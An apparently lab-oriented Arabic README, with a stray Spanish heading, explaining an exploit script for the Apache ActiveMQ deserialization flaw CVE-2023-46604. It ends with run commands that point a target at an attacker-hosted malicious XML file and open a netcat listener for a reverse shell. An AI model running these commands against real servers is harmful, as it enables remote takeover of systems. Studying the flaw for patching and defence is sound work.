
يستغل السكريبت ثغرة إلغاء التسلسل غير الآمن في Apache ActiveMQ (CVE-2023-46604)
Resumen Técnico del Ataque: CVE-2023-46604
يستغل السكربت ثغرة إلغاء التسلسل غير الآمن في Apache ActiveMQ (CVE-2023-46604) لتحقيق تنفيذ التعليمات البرمجية عن بُعد على الخادم المستهدف. وصف عملية الاستغلال
هدف الثغرة الأمنية:
تكمن الثغرة في بروتوكول OpenWire الخاص بـ Apache ActiveMQ.
تسمح بإلغاء تسلسل غير آمن للكائنات، وهو ما يمكن استغلاله لتنفيذ كود عشوائي على الخادم.
المتطلبات المسبقة:
الوصول الشبكي إلى خادم ActiveMQ.
ملف XML خبيث (poc.xml) متاح عبر رابط URL يمكن للخادم المستهدف الوصول إليه.
مكونات الهجوم:
سكربت Python: يعمل على أتمتة إرسال الحمولة الخبيثة إلى خادم ActiveMQ.
ملف XML (poc.xml): يحتوي على Bean من Spring يُعرّف تنفيذ أمر خبيث (مثل فتح شل عكسي).
خطوات الهجوم
تحضير الحمولة (Payload):
ينشئ السكربت رسالة بالنظام الست عشري تتضمن:
اسم فئة Java: org.springframework.context.support.ClassPathXmlApplicationContext.
رابط URL الخاص بملف XML الخبيث.
يتم تحويل الحمولة إلى تسلسل بايتات يمكن إرسالها عبر بروتوكول OpenWire.
إرسال الحمولة:
يفتح السكربت اتصال Socket عبر TCP إلى خادم ActiveMQ على المنفذ المحدد (الافتراضي 61616).
يرسل الحمولة الخبيثة إلى الخادم.
تنفيذ الكود الخبيث:
يقوم خادم ActiveMQ بإلغاء تسلسل الكائن المحدد في الحمولة.
بسبب إلغاء التسلسل غير الآمن، يتم تحميل وتنفيذ Bean الخاص بـ Spring والمُعرّف في ملف XML.
ينفذ هذا الـ Bean أمرًا خبيثًا (مثل شل عكسي) على الخادم.
_________________________________________________________
مثال على التشغيل:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
تم نسخ هذا السكربت وتعديله إلى الإسبانية:https://github.com/evkl1d/CVE-2023-46604.git